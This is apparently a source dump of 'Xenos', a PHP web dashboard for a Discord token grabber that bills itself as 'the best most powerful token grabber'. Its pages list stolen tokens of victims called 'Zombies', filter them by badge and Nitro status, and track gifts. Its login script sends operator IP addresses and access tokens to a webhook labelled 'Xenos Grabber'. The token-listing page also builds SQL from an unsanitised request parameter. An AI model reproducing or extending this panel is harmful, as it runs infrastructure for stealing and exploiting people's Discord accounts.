https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/icomoon/icomoon.woff -------------------------------------------------------------------------------- /assets/images/Default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/images/Default.png -------------------------------------------------------------------------------- /assets/images/kaneki.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/images/kaneki.gif -------------------------------------------------------------------------------- /assets/images/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/images/logo.jpg -------------------------------------------------------------------------------- /assets/images/xenos.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/images/xenos.gif -------------------------------------------------------------------------------- /assets/js/filter.js: -------------------------------------------------------------------------------- 1 | function SearchByGrade(grade) { 2 | srv = window.location.href.split("?badge=")[0] 3 | window.location.href=srv+"?badge="+grade.value; 4 | } 5 | -------------------------------------------------------------------------------- /async/login.php: -------------------------------------------------------------------------------- 1 | $OAUTH2_CLIENT_ID, 13 | 'redirect_uri' => $RedirectUrl, 14 | 'response_type' => 'code', 15 | 'scope' => 'identify guilds' 16 | ); 17 | 18 | $_SESSION["logged"] = false; 19 | header('Location: https://discord.com/api/oauth2/authorize' . '?' . http_build_query($params)); die(); 20 | } else if(isset($_GET['code']) && !empty($_GET["code"])) { 21 | $token = curl_init(); 22 | curl_setopt_array($token, array( 23 | CURLOPT_URL => $tokenURL, 24 | CURLOPT_POST => 1, 25 | CURLOPT_POSTFIELDS => array( 26 | "grant_type" => "authorization_code", 27 | "client_id" => $OAUTH2_CLIENT_ID, 28 | "client_secret" => $OAUTH2_CLIENT_SECRET, 29 | "redirect_uri" => $RedirectUrl, 30 | "code" => htmlspecialchars($_GET["code"]), 31 | ) 32 | )); 33 | curl_setopt($token, CURLOPT_RETURNTRANSFER, true); 34 | $resp = json_decode(curl_exec($token)); 35 | curl_close($token); 36 | 37 | if (isset($resp->access_token)) { 38 | 39 | $info = curl_init(); 40 | curl_setopt_array($info, array( 41 | CURLOPT_URL => $InfosRequest, 42 | CURLOPT_HTTPHEADER => array( 43 | "Authorization: Bearer " . $resp->access_token 44 | ), 45 | CURLOPT_RETURNTRANSFER => true 46 | )); 47 | $user = json_decode(curl_exec($info)); 48 | curl_close($info); 49 | 50 | if(in_array(strval($user->id), $WhitelistIds)) { 51 | $_SESSION['access_token'] = $resp->access_token; 52 | $_SESSION["login_username"] = "{$user->username}#{$user->discriminator}"; 53 | $_SESSION["login_avatar"] = "https://cdn.discordapp.com/avatars/{$user->id}/{$user->avatar}"; 54 | SendToWebhook($webhook, json_encode( 55 | [ 56 | "username" => "Xenos Grabber", 57 | "avatar_url" => "https://github.com/KanekiWeb/Xenos/blob/main/assets/images/xenos.gif?raw=true", 58 | "embeds" => [ 59 | [ 60 | "description" => "> __Tentative de connexion à Xenos Réussi:__\n```diff\n+ Login Username: {$user->username}#{$user->discriminator}\n+ Login ID: {$user->id}\n+ Ip Adress: {$_SERVER['REMOTE_ADDR']}\n+ Access Token: {$resp->access_token}```\n\n", 61 | "thumbnail" => [ 62 | "url" => "https://cdn.discordapp.com/avatars/{$user->id}/{$user->avatar}" 63 | ], 64 | "image" => [ 65 | "url" => "https://discordapp.com/api/v6/users/banners/{$user->id}/{$user->avatar}" 66 | ], 67 | "footer" => [ 68 | "text" => "Xenos Grabber - https://github.com/KanekiWeb", 69 | "icon_url" => "https://github.com/KanekiWeb/Xenos/blob/main/assets/images/xenos.gif?raw=true" 70 | ], 71 | "color" => hexdec("279930") 72 | ] 73 | ] 74 | ] 75 | )); 76 | } else { 77 | SendToWebhook($webhook, json_encode( 78 | [ 79 | "username" => "Xenos Grabber", 80 | "avatar_url" => "https://github.com/KanekiWeb/Xenos/blob/main/assets/images/xenos.gif?raw=true", 81 | "embeds" => [ 82 | [ 83 | "description" => "> __Tentative de connexion à Xenos Refusé:__\n```diff\n- Login Username: {$user->username}#{$user->discriminator}\n- Login ID: {$user->id}\n- Ip Adress: {$_SERVER['REMOTE_ADDR']}\n- Access Token: {$resp->access_token}```\n\n", 84 | "thumbnail" => [ 85 | "url" => "https://cdn.discordapp.com/avatars/{$user->id}/{$user->avatar}" 86 | ], 87 | "image" => [ 88 | "url" => "https://discordapp.com/api/v6/users/banners/{$user->id}/{$user->avatar}" 89 | ], 90 | "footer" => [ 91 | "text" => "Xenos Grabber - https://github.com/KanekiWeb", 92 | "icon_url" => "https://github.com/KanekiWeb/Xenos/blob/main/assets/images/xenos.gif?raw=true" 93 | ], 94 | "color" => hexdec("992727") 95 | ] 96 | ] 97 | ] 98 | )); 99 | } 100 | } 101 | 102 | header('Location: ../'); die(); 103 | } 104 | 105 | ?> -------------------------------------------------------------------------------- /gifts.php: -------------------------------------------------------------------------------- 1 | 13 | 14 |
15 |
16 | 17 |

Xenos Project

18 |

The Best Most powerfull token grabber with user interface.

19 |
20 |
21 | 22 |
23 |
24 | query('SELECT * FROM gifts'); 27 | while ($gift = $resp->fetch()) { 28 | ?> 29 |
30 | 31 |

32 |
33 | 34 | 35 |
36 |
37 | 38 | 41 | 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | 13 | 14 | 15 |
16 |
17 | 18 |

Xenos Project

19 |

The Best Most powerfull token grabber with user interface.

20 | View Zombies 21 |
22 |
23 | 24 | 25 |
26 | 29 |
30 |
31 | 32 |

Zombies

33 |
34 | 35 |
36 | 37 |

Gifts

38 |
39 | 40 |
41 | / 42 |

Flaged

43 |
44 |
45 |
46 | 47 | 48 | 49 |
50 |
51 |
52 | " alt="" srcset=""> 53 | 54 |

Your are successfully connected to Xenos as

55 |
56 |
57 |
58 |
59 |
60 |
61 | 62 | ParadoxW3b 63 |

Self Taught & FreeLance Developer !

64 | Follow 65 |
66 |
67 |
68 | 69 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /login.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 |
14 |
15 | 16 |

Xenos Project

17 |

The Best Most powerfull token grabber with user interface.

18 | 21 |
22 |
23 | 24 | 27 | 28 | -------------------------------------------------------------------------------- /logout.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /token.php: -------------------------------------------------------------------------------- 1 | prepare('SELECT * FROM tokens WHERE `user_id` = ?'); 15 | $req->execute(array(htmlspecialchars($_GET['id']))); 16 | $user = $req->fetch(); 17 | 18 | if($req->rowCount() == 0){ 19 | header('Location: tokens'); die(); 20 | } 21 | } else { 22 | header('Location: tokens'); die(); 23 | } 24 | } else { 25 | header('Location: tokens'); die(); 26 | } 27 | 28 | $title = "Token"; 29 | require('Inc/Dash.php'); 30 | 31 | ?> 32 | 33 | 34 |
35 |
36 | 37 |

Xenos Project

38 |

The Best Most powerfull token grabber with user interface.

39 |
40 |
41 | 42 |
43 |
44 |
45 | 46 |
47 | () 48 |

49 |

50 |
51 | '; 54 | }else if($user['badges'] == 2) { 55 | echo ''; 56 | }else if($user['badges'] == 4) { 57 | echo ''; 58 | }else if($user['badges'] == 8) { 59 | echo ''; 60 | }else if($user['badges'] == 64) { 61 | echo ''; 62 | }else if($user['badges'] == 128) { 63 | echo ''; 64 | }else if($user['badges'] == 256) { 65 | echo ''; 66 | }else if($user['badges'] == 512) { 67 | echo ''; 68 | }else if($user['badges'] == 131072) { 69 | echo ''; 70 | } 71 | 72 | if($user['nitro_badges'] == 1) { 73 | echo ''; 74 | }else if($user['nitro_badges'] == 2) { 75 | echo ''; 76 | echo ''; 77 | } 78 | ?> 79 |
80 |
81 |
82 |
83 |
84 | 85 | 86 |
87 | 88 |
89 | 90 | 91 |
92 |
93 | Delete User 94 |
95 |
96 |
97 |
98 | 99 | 102 | 103 | -------------------------------------------------------------------------------- /tokens.php: -------------------------------------------------------------------------------- 1 | 14 | 15 | 16 |
17 |
18 | 19 |

Xenos Project

20 |

The Best Most powerfull token grabber with user interface.

21 |
22 |
23 | 24 |
25 |
26 | 44 | 45 | 46 |
47 |
48 | query('SELECT * FROM tokens'); 56 | } else if ($badge == "1337") { 57 | $resp = $bdd->query('SELECT * FROM tokens WHERE nitro_badges = 1'); 58 | } else if ($badge == "1338") { 59 | $resp = $bdd->query('SELECT * FROM tokens WHERE nitro_badges = 2'); 60 | } else if ($badge == "FLAGED") { 61 | $resp = $bdd->query('SELECT * FROM tokens WHERE isflaged = 1'); 62 | } else if ($badge == "NOFLAGED") { 63 | $resp = $bdd->query('SELECT * FROM tokens WHERE isflaged = 0'); 64 | } else { 65 | $resp = $bdd->query('SELECT * FROM tokens WHERE badges = ' . $badge); 66 | } 67 | } 68 | } else { 69 | $resp = $bdd->query('SELECT * FROM tokens'); 70 | } 71 | 72 | while ($user = $resp->fetch()) { 73 | ?> 74 |
"> 75 | 82 | () 83 |

84 |

85 |
86 | '; 89 | }else if($user['badges'] == 2) { 90 | echo ''; 91 | }else if($user['badges'] == 4) { 92 | echo ''; 93 | }else if($user['badges'] == 8) { 94 | echo ''; 95 | }else if($user['badges'] == 64) { 96 | echo ''; 97 | }else if($user['badges'] == 128) { 98 | echo ''; 99 | }else if($user['badges'] == 256) { 100 | echo ''; 101 | }else if($user['badges'] == 512) { 102 | echo ''; 103 | }else if($user['badges'] == 131072) { 104 | echo ''; 105 | } 106 | 107 | if($user['nitro_badges'] == 1) { 108 | echo ''; 109 | }else if($user['nitro_badges'] == 2) { 110 | echo ''; 111 | echo ''; 112 | } 113 | ?> 114 |
115 | View All Infos 116 |
117 | 118 | 121 |
122 |
123 | 124 | 127 | 128 | 129 | 130 | 131 | --------------------------------------------------------------------------------